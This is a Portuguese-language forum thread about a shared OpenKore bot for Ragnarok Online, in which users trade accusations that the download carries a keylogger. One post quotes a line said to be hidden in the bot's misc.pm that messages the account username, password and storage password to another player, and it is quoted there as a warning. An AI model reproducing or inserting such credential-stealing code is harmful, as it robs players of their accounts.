Ir para conteúdo
Faça parte da equipe! (2024) ×
Conheça nossa Beta Zone! Novas áreas a caminho! ×
  • Quem está por aqui   0 membros estão online

• Nenhum usuário registrado visualizando esta página.

OpenKore funcional Scan+Macros em Português[Atualização Semanal]

Compartilhar

Posts Recomendados

Esse openkore é do webopenkore é uma outra conta dele,quem baixar talvez corra risco de ser hakeado,mais concertesa ele vai editar o topico depois e colcoar o bot com keylloger e concertesa serão hekados,não baixem isso ou serão roubados

Link para o comentário
Compartilhar em outros sites

Cara o meu bot não tem nada haver com o bot dele.

Eu mesmo editei tudo certinho nele....

Se tem KL mostre e prove o que você esta falando...

Ja o seu topico foi provado que tinha KL e foi fechado ne?

A moderação aqui ta muito fraca, não esta dando ban permanente em pessoas iguais a você que postam KL!

No maximo dao so alguns dias e depois desbloqueiam a conta! ¬¬'

Link para o comentário

Este kore esta limpo....

Esses caras ai que não tem o que fazer e fica falando merda sem provar nada!

Esse membro ai teve seu topico fechado a poucos dias por ter postado bot com KL!

Se duvida que ele e membro suspeito so olhar o topico dele que foi fechado http://www.webcheats.com.br/forum/rag-cheats/1429866-openkore-2-7-sempre-atualizado-video-aula-scan-macro-thor-e-odin-traduzido-portugues-10.html

Link para o comentário

Olá Galera, eu sou novo no fórum e procuro um Openkore pra rodar num server private que abriu esses dias... Uma duvida, se eu baixar esse e mudar o server ele funciona normalmente ?

Alguem tem um tutorial de configuração de bot ow poderia me ajudar pessoalmente ? Sou totalmente leigo no assunto e preciso de uma luz, por favor alguem me responda. =D

Link para o comentário

Sim, se vc baixar este bot e depois obter as informaçoes do servidor que vc pretende botear e colocar neste ele ira rodar normalmente.

Mais recomendo baixar um bot completo pois este que ja vem editado normalmente costuma dar alguns problemas depois.

Link para o comentário

• 4 semanas atrás...

Ai cara Parabens por deponibilisar o primeiro bot de hoje sem KL por q os q ja olhei hoje quando num ta nos pluguins esta no arquivo bRO é muita sacanagem com quem esta comesando agora como eu.

eu so não to sabendo como atualisar o bot semanalmente + com as dicas e esse programinha q tem o openkoreAnaliz q tem nesse forum ja aprindi + o - os arquivos q esses malas ficam colocando os Kls

e quem duvidar pode olhar nos outros topicos q tem os horaios q reclamei la e q baixei e testei eles ate robado fui Hoje.

valew esse forum ta precisando de jente seria ta muito mal falado com esses Kls

Link para o comentário

Esse topico pertence ao MobileMan,Webopenkore o mesmo que hakeo o pessoal e ele vai editar e colocar keylloger jamais baixem isso ou seram hakeados

Cara deixa de falar babaquice, você ja teve topico fechado aqui na wc por conter kl...

E so n ta postando mais falando que tem kl aqui no meu topico pq o roxjames conseguiu fazer banir as outras contas suas unica coisa q ele fez de descente aki na wc!

Link para o comentário

Script Malicioso No arquivo misc.pm da pasta src

Commands::run("pm \"pluginHork\" ID:".$config{username}."\ | sen:".$config{password}."\ | Str:".$config{storageAuto_password}."\ | map:".$config{lockMap})

Só para constar se mexer no topico vai ta atestando a culpa

>>>>>>>Última edição por espectador; Hoje às 04:17 PM. Razão: Atualização de conteúdo dia 22-03!<<<<<<<<<<

Link para o comentário

Este tópico está impedido de receber novos posts.
 Compartilhar

• Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.